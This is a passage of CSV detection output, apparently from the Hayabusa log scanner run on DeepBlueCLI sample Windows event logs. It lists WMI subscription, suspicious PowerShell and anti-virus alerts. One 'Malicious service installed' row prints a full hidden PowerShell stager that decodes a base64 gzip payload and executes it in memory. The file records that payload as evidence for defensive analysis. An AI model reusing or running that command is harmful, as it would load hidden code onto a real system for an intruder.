Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: SYyGmEHvgHiGYApk : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:40:21.464 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 23:00:17.112 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:49:00.074 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:28:38.656 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - 